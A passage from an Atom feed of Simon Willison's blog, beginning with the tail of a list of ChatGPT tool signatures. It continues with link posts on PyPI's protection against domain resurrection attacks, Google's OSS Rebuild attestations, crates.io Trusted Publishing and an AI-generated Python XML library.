&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; List existing automations.&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt; &lt;code&gt;automations.list() -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="guardian-tool"&gt;guardian_tool&lt;/h4&gt;
&lt;h5 id="guardian-tool-get-policy-str"&gt;
&lt;code&gt;guardian_tool.get_policy&lt;/code&gt; → str&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Retrieve policy guidance for specific categories (currently: &lt;code&gt;election_voting&lt;/code&gt;).&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt; &lt;code&gt;guardian_tool.get_policy({ category: string }) -&amp;gt; str&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="file-search"&gt;file_search&lt;/h4&gt;
&lt;h5 id="file-search-msearch-any"&gt;
&lt;code&gt;file_search.msearch&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Search across available internal/connected sources (in this environment: primarily “recording_knowledge” transcripts when relevant).&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;file_search.msearch({ queries?: string[], source_filter?: string[], file_type_filter?: string[], intent?: string, time_frame_filter?: { start_date?: string, end_date?: string } }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;h5 id="file-search-mclick-any"&gt;
&lt;code&gt;file_search.mclick&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Expand/open previously returned search results (or connector URLs) for more context.&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;file_search.mclick({ pointers?: string[], start_date?: string, end_date?: string }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="gmail-read-only-"&gt;gmail (read-only)&lt;/h4&gt;
&lt;h5 id="gmail-search-email-ids-any"&gt;
&lt;code&gt;gmail.search_email_ids&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Search Gmail message IDs by query/tags (read-only).&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;gmail.search_email_ids({ query?: string, tags?: string[], max_results?: integer, next_page_token?: string }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;h5 id="gmail-batch-read-email-any"&gt;
&lt;code&gt;gmail.batch_read_email&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Read a batch of Gmail messages by message IDs (read-only).&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;gmail.batch_read_email({ message_ids: string[] }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="gcal-read-only-"&gt;gcal (read-only)&lt;/h4&gt;
&lt;h5 id="gcal-search-events-any"&gt;
&lt;code&gt;gcal.search_events&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Search Google Calendar events in a time range and/or by keyword (read-only).&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;gcal.search_events({ time_min?: string, time_max?: string, timezone_str?: string, max_results?: integer, query?: string, calendar_id?: string, next_page_token?: string }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;h5 id="gcal-read-event-any"&gt;
&lt;code&gt;gcal.read_event&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Read a specific calendar event by ID (read-only).&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;gcal.read_event({ event_id: string, calendar_id?: string }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="gcontacts-read-only-"&gt;gcontacts (read-only)&lt;/h4&gt;
&lt;h5 id="gcontacts-search-contacts-any"&gt;
&lt;code&gt;gcontacts.search_contacts&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Search Google Contacts by keyword (read-only).&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;gcontacts.search_contacts({ query: string, max_results?: integer }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="canmore-canvas-"&gt;canmore (canvas)&lt;/h4&gt;
&lt;h5 id="canmore-create-textdoc-any"&gt;
&lt;code&gt;canmore.create_textdoc&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Create a new canvas text document (markdown or code).&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;canmore.create_textdoc({ name: string, type: "document" | "code/bash" | "code/zsh" | "code/javascript" | "code/typescript" | "code/html" | "code/css" | "code/python" | "code/json" | "code/sql" | "code/go" | "code/yaml" | "code/java" | "code/rust" | "code/cpp" | "code/swift" | "code/php" | "code/xml" | "code/ruby" | "code/haskell" | "code/kotlin" | "code/csharp" | "code/c" | "code/objectivec" | "code/r" | "code/lua" | "code/dart" | "code/scala" | "code/perl" | "code/commonlisp" | "code/clojure" | "code/ocaml" | "code/powershell" | "code/verilog" | "code/dockerfile" | "code/vue" | "code/react" | "code/other", content: string }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;h5 id="canmore-update-textdoc-any"&gt;
&lt;code&gt;canmore.update_textdoc&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Apply regex-based edits to the current canvas textdoc.&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;canmore.update_textdoc({ updates: { pattern: string, multiple?: boolean, replacement: string }[] }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;h5 id="canmore-comment-textdoc-any"&gt;
&lt;code&gt;canmore.comment_textdoc&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Add actionable comments on matched regions of the current canvas textdoc.&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;canmore.comment_textdoc({ comments: { pattern: string, comment: string }[] }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="python-user-visible"&gt;python_user_visible&lt;/h4&gt;
&lt;h5 id="python-user-visible-exec-freeform-any"&gt;
&lt;code&gt;python_user_visible.exec&lt;/code&gt; (FREEFORM) → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Execute Python code &lt;em&gt;that you will see&lt;/em&gt; (tables, plots, generated files). Internet disabled.&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt; &lt;code&gt;python_user_visible.exec(FREEFORM) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="user-info"&gt;user_info&lt;/h4&gt;
&lt;h5 id="user-info-get-user-info-any"&gt;
&lt;code&gt;user_info.get_user_info&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Get your current location and local time (or UTC if unknown).&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt; &lt;code&gt;user_info.get_user_info({}) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="summary-reader"&gt;summary_reader&lt;/h4&gt;
&lt;h5 id="summary-reader-read-any"&gt;
&lt;code&gt;summary_reader.read&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Read safe-to-share internal reasoning summaries from earlier turns (used when asked how I arrived at something).&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt; &lt;code&gt;summary_reader.read({ limit?: integer, offset?: integer }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="container"&gt;container&lt;/h4&gt;
&lt;h5 id="container-exec-any"&gt;
&lt;code&gt;container.exec&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Run a command inside the container and return stdout/stderr.&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;container.exec({ cmd: string[], session_name?: string | null, workdir?: string | null, timeout?: integer | null, env?: object | null, user?: string | null }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;h5 id="container-feed-chars-any"&gt;
&lt;code&gt;container.feed_chars&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Send input to a running interactive exec session and flush output.&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;container.feed_chars({ session_name: string, chars: string, yield_time_ms?: integer }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;h5 id="container-open-image-any"&gt;
&lt;code&gt;container.open_image&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Display an image from an absolute path in the container (jpg/jpeg/png/webp).&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;container.open_image({ path: string, user?: string | null }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;h5 id="container-download-any"&gt;
&lt;code&gt;container.download&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Download a file from a URL into the container filesystem.&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;container.download({ url: string, filepath: string }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="bio-memory-"&gt;bio (memory)&lt;/h4&gt;
&lt;h5 id="bio-update-freeform-any"&gt;
&lt;code&gt;bio.update&lt;/code&gt; (FREEFORM) → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Persist (or forget) user-specific info across conversations (“memory”).&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt; &lt;code&gt;bio.update(FREEFORM) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="api-tool"&gt;api_tool&lt;/h4&gt;
&lt;h5 id="api-tool-list-resources-any"&gt;
&lt;code&gt;api_tool.list_resources&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; List available “resources” (including invokable tools) in an OP-style file tree.&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;api_tool.list_resources({ path?: string, cursor?: string | null, only_tools?: boolean, refetch_tools?: boolean }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;h5 id="api-tool-call-tool-any"&gt;
&lt;code&gt;api_tool.call_tool&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Invoke a resource as a tool (must know its full path/URI from &lt;code&gt;list_resources&lt;/code&gt;).&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;api_tool.call_tool({ path: string, args: object }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="personal-context"&gt;personal_context&lt;/h4&gt;
&lt;h5 id="personal-context-search-any"&gt;
&lt;code&gt;personal_context.search&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Retrieve user-specific context from prior interactions/linked sources to maintain continuity.&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;personal_context.search({ query: string }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="image-gen"&gt;image_gen&lt;/h4&gt;
&lt;h5 id="image-gen-text2im-any"&gt;
&lt;code&gt;image_gen.text2im&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Generate or edit images from text instructions (and optionally referenced image IDs).&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;image_gen.text2im({ prompt?: string | null, size?: string | null, n?: integer | null, transparent_background?: boolean | null, is_style_transfer?: boolean | null, referenced_image_ids?: string[] | null }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="user-settings"&gt;user_settings&lt;/h4&gt;
&lt;h5 id="user-settings-get-user-settings-any"&gt;
&lt;code&gt;user_settings.get_user_settings&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Read current settings and allowed values (personality, accent color, appearance).&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt; &lt;code&gt;user_settings.get_user_settings() -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;h5 id="user-settings-set-setting-any"&gt;
&lt;code&gt;user_settings.set_setting&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Change one setting (accent color, appearance, or personality) to an allowed value.&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;user_settings.set_setting({ setting_name: "accent_color" | "appearance" | "personality", setting_value: string }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="artifact-handoff"&gt;artifact_handoff&lt;/h4&gt;
&lt;h5 id="artifact-handoff-prepare-artifact-generation-any"&gt;
&lt;code&gt;artifact_handoff.prepare_artifact_generation&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Must be called immediately when the user asks for a spreadsheet or slide deck artifact.&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt; &lt;code&gt;artifact_handoff.prepare_artifact_generation() -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;/details&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sandboxing"&gt;sandboxing&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/npm"&gt;npm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/openai"&gt;openai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/chatgpt"&gt;chatgpt&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/code-interpreter"&gt;code-interpreter&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="pypi"/><category term="sandboxing"/><category term="npm"/><category term="ai"/><category term="openai"/><category term="generative-ai"/><category term="chatgpt"/><category term="llms"/><category term="ai-assisted-programming"/><category term="code-interpreter"/></entry><entry><title>PyPI: Preventing Domain Resurrection Attacks</title><link href="https://simonwillison.net/2025/Aug/19/pypi-preventing-domain-resurrection-attacks/#atom-tag" rel="alternate"/><published>2025-08-19T15:36:44+00:00</published><updated>2025-08-19T15:36:44+00:00</updated><id>https://simonwillison.net/2025/Aug/19/pypi-preventing-domain-resurrection-attacks/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://blog.pypi.org/posts/2025-08-18-preventing-domain-resurrections/"&gt;PyPI: Preventing Domain Resurrection Attacks&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Domain resurrection attacks are a nasty vulnerability in systems that use email verification to allow people to recover their accounts. If somebody lets their domain name expire, an attacker might snap it up and use it to gain access to their accounts - which can turn into a package supply chain attack if they had an account on something like the Python Package Index.&lt;/p&gt;
&lt;p&gt;PyPI now protects against these by treating an email address as not-validated if the associated domain expires.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Since early June 2025, PyPI has unverified over 1,800 email addresses when their associated domains entered expiration phases. This isn't a perfect solution, but it closes off a significant attack vector where the majority of interactions would appear completely legitimate.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This attack is not theoretical: it happened to the &lt;code&gt;ctx&lt;/code&gt; package on PyPI &lt;a href="https://python-security.readthedocs.io/pypi-vuln/index-2022-05-24-ctx-domain-takeover.html"&gt;back in May 2022&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Here's the &lt;a href="https://github.com/pypi/warehouse/pull/17832"&gt;pull request&lt;/a&gt; from April in which Mike Fiedler landed an integration which hits an API provided by Fastly's &lt;a href="https://domainr.com/"&gt;Domainr&lt;/a&gt;, followed by &lt;a href="https://github.com/pypi/warehouse/pull/18014"&gt;this PR&lt;/a&gt; which &lt;a href="https://github.com/miketheman/warehouse/blob/48f082b4fb085a25dabdb87c2e158af04b1ba5e8/warehouse/accounts/tasks.py#L141-L164"&gt;polls for domain status&lt;/a&gt; on any email domain that hasn't been checked in the past 30 days.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=44950091"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/domains"&gt;domains&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;&lt;/p&gt;



</summary><category term="domains"/><category term="pypi"/><category term="python"/><category term="security"/><category term="supply-chain"/></entry><entry><title>Introducing OSS Rebuild: Open Source, Rebuilt to Last</title><link href="https://simonwillison.net/2025/Jul/23/oss-rebuild/#atom-tag" rel="alternate"/><published>2025-07-23T17:16:32+00:00</published><updated>2025-07-23T17:16:32+00:00</updated><id>https://simonwillison.net/2025/Jul/23/oss-rebuild/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://security.googleblog.com/2025/07/introducing-oss-rebuild-open-source.html"&gt;Introducing OSS Rebuild: Open Source, Rebuilt to Last&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Major news on the &lt;a href="https://reproducible-builds.org/"&gt;Reproducible Builds&lt;/a&gt; front: the Google Security team have announced &lt;a href="https://github.com/google/oss-rebuild"&gt;OSS Rebuild&lt;/a&gt;, their project to provide build attestations for open source packages released through the NPM, PyPI and Crates ecosystems (and more to come).&lt;/p&gt;
&lt;p&gt;They currently run builds against the "most popular" packages from those ecosystems:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Through automation and heuristics, we determine a prospective build definition for a target package and rebuild it. We semantically compare the result with the existing upstream artifact, normalizing each one to remove instabilities that cause bit-for-bit comparisons to fail (e.g. archive compression). Once we reproduce the package, we publish the build definition and outcome via &lt;a href="https://slsa.dev/spec/v0.1/provenance"&gt;SLSA Provenance&lt;/a&gt;. This attestation allows consumers to reliably verify a package's origin within the source history, understand and repeat its build process, and customize the build from a known-functional baseline&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The only way to interact with the Rebuild data right now is through their &lt;a href="https://github.com/google/oss-rebuild"&gt;Go CLI tool&lt;/a&gt;. I reverse-engineered it &lt;a href="https://gist.github.com/simonw/a5416718587aadfb0ce5f046b66b54fb"&gt;using Gemini 2.5 Pro&lt;/a&gt; and derived this command to get a list of all of their built packages:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;gsutil ls -r 'gs://google-rebuild-attestations/**'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There are 9,513 total lines, &lt;a href="https://gist.github.com/simonw/9287de5900d5b76969e331d9b4ad9eba"&gt;here's a Gist&lt;/a&gt;. I &lt;a href="https://gist.github.com/simonw/7b1d0a01f74c2e8d8cedea7a9dc7f8d7"&gt;used Claude Code&lt;/a&gt; to count them across the different ecosystems (discounting duplicates for different versions of the same package):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;pypi: 5,028 packages&lt;/li&gt;
&lt;li&gt;cratesio: 2,437 packages&lt;/li&gt;
&lt;li&gt;npm: 2,048 packages&lt;/li&gt;
&lt;/ul&gt;
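Deduplicating that listing takes only a few lines of Python, assuming each object path follows the `gs://google-rebuild-attestations/<ecosystem>/<package>/<version>/...` layout visible in the Gist (the path layout here is an assumption inferred from the listing, not a documented format):

```python
from collections import defaultdict

BUCKET_PREFIX = "gs://google-rebuild-attestations/"  # assumed bucket layout

def count_packages(listing_lines):
    """Count unique packages per ecosystem, collapsing multiple versions."""
    seen = defaultdict(set)
    for line in listing_lines:
        if not line.startswith(BUCKET_PREFIX):
            continue
        # Expected layout: <ecosystem>/<package>/<version>/<attestation file>
        parts = line.removeprefix(BUCKET_PREFIX).split("/")
        if len(parts) >= 2 and parts[1]:
            ecosystem, package = parts[0], parts[1]
            seen[ecosystem].add(package)
    return {eco: len(pkgs) for eco, pkgs in seen.items()}
```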
&lt;p&gt;Then I got a bit ambitious... since the files themselves are hosted in a Google Cloud Bucket, could I run my own web app somewhere on &lt;code&gt;storage.googleapis.com&lt;/code&gt; that could use &lt;code&gt;fetch()&lt;/code&gt; to retrieve that data, working around the lack of open CORS headers?&lt;/p&gt;
&lt;p&gt;I &lt;a href="https://gist.github.com/simonw/178a1cb57597a7b8aaa4910beae89cd3"&gt;got Claude Code to try that for me&lt;/a&gt; (I didn't want to have to figure out how to create a bucket and configure it for web access just for this one experiment) and it built and then deployed &lt;a href="https://storage.googleapis.com/rebuild-ui/index.html"&gt;https://storage.googleapis.com/rebuild-ui/index.html&lt;/a&gt;, which did indeed work!&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of Google Rebuild Explorer interface showing a search box with placeholder text &amp;quot;Type to search packages (e.g., 'adler', 'python-slugify')...&amp;quot; under &amp;quot;Search rebuild attestations:&amp;quot;, a loading file path &amp;quot;pypi/accelerate/0.21.0/accelerate-0.21.0-py3-none-any.whl/rebuild.intoto.jsonl&amp;quot;, and Object 1 containing JSON with &amp;quot;payloadType&amp;quot;: &amp;quot;in-toto.io Statement v1 URL&amp;quot;, &amp;quot;payload&amp;quot;: &amp;quot;...&amp;quot;, &amp;quot;signatures&amp;quot;: [{&amp;quot;keyid&amp;quot;: &amp;quot;Google Cloud KMS signing key URL&amp;quot;, &amp;quot;sig&amp;quot;: &amp;quot;...&amp;quot;}]" src="https://static.simonwillison.net/static/2025/rebuild-ui.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;It lets you search against that list of packages from the Gist and then select one to view the pretty-printed newline-delimited JSON that was stored for that package.&lt;/p&gt;
&lt;p&gt;The output isn't as interesting as I was expecting, but it was fun demonstrating that it's possible to build and deploy web apps to Google Cloud that can then make &lt;code&gt;fetch()&lt;/code&gt; requests to other public buckets.&lt;/p&gt;
&lt;p&gt;Hopefully the OSS Rebuild team will &lt;a href="https://news.ycombinator.com/item?id=44646925#44652098"&gt;add a web UI&lt;/a&gt; to their project at some point in the future.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=44646925"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/google"&gt;google&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/packaging"&gt;packaging&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/npm"&gt;npm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-coding"&gt;vibe-coding&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-code"&gt;claude-code&lt;/a&gt;&lt;/p&gt;



</summary><category term="google"/><category term="packaging"/><category term="pypi"/><category term="security"/><category term="npm"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="ai-assisted-programming"/><category term="supply-chain"/><category term="vibe-coding"/><category term="claude-code"/></entry><entry><title>crates.io: Trusted Publishing</title><link href="https://simonwillison.net/2025/Jul/12/cratesio-trusted-publishing/#atom-tag" rel="alternate"/><published>2025-07-12T16:12:18+00:00</published><updated>2025-07-12T16:12:18+00:00</updated><id>https://simonwillison.net/2025/Jul/12/cratesio-trusted-publishing/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://blog.rust-lang.org/2025/07/11/crates-io-development-update-2025-07/"&gt;crates.io: Trusted Publishing&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;crates.io is the Rust ecosystem's equivalent of PyPI. Inspired by PyPI's GitHub integration (see &lt;a href="https://til.simonwillison.net/pypi/pypi-releases-from-github"&gt;my TIL&lt;/a&gt;, I use this for dozens of my packages now) they've added a similar feature:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Trusted Publishing eliminates the need for GitHub Actions secrets when publishing crates from your CI/CD pipeline. Instead of managing API tokens, you can now configure which GitHub repository you trust directly on crates.io.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;They're missing one feature that PyPI has: on PyPI you can create a "pending publisher" for your first release. crates.io currently requires the first release to be manual:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;To get started with Trusted Publishing, you'll need to publish your first release manually. After that, you can set up trusted publishing for future releases.&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://x.com/charliermarsh/status/1943853345967423506"&gt;@charliermarsh&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/github"&gt;github&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/packaging"&gt;packaging&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/rust"&gt;rust&lt;/a&gt;&lt;/p&gt;



</summary><category term="github"/><category term="packaging"/><category term="pypi"/><category term="rust"/></entry><entry><title>My First Open Source AI Generated Library</title><link href="https://simonwillison.net/2025/Jun/21/my-first-open-source-ai-generated-library/#atom-tag" rel="alternate"/><published>2025-06-21T23:22:45+00:00</published><updated>2025-06-21T23:22:45+00:00</updated><id>https://simonwillison.net/2025/Jun/21/my-first-open-source-ai-generated-library/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://lucumr.pocoo.org/2025/6/21/my-first-ai-library/"&gt;My First Open Source AI Generated Library&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Armin Ronacher had Claude and Claude Code do almost &lt;em&gt;all of the work&lt;/em&gt; in building, testing, packaging and publishing a new Python library based on his design:&lt;/p&gt;
&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;It wrote ~1100 lines of code for the parser&lt;/li&gt;
&lt;li&gt;It wrote ~1000 lines of tests&lt;/li&gt;
&lt;li&gt;It configured the entire Python package, CI, PyPI publishing&lt;/li&gt;
&lt;li&gt;Generated a README, drafted a changelog, designed a logo, made it theme-aware&lt;/li&gt;
&lt;li&gt;Did multiple refactorings to make me happier&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;The project? &lt;a href="https://github.com/mitsuhiko/sloppy-xml-py"&gt;sloppy-xml-py&lt;/a&gt;, a lax XML parser (and violation of everything the XML Working Group hold sacred) which ironically is necessary because LLMs themselves frequently output "XML" that includes validation errors.&lt;/p&gt;
&lt;p&gt;Claude's SVG logo design is actually pretty decent, turns out it can draw &lt;a href="https://simonwillison.net/2025/May/22/code-with-claude-live-blog/#live-update-357"&gt;more than just bad pelicans&lt;/a&gt;!&lt;/p&gt;
&lt;center&gt;&lt;img alt="Hand drawn style, orange rough rectangle containing &amp;lt; { s } &amp;gt; - then the text Sloppy XML below in black" src="https://static.simonwillison.net/static/2025/sloppy-xml.jpg" /&gt;&lt;/center&gt;

&lt;p&gt;I think experiments like this are a really valuable way to explore the capabilities of these models. Armin's conclusion:&lt;/p&gt;
&lt;blockquote&gt;
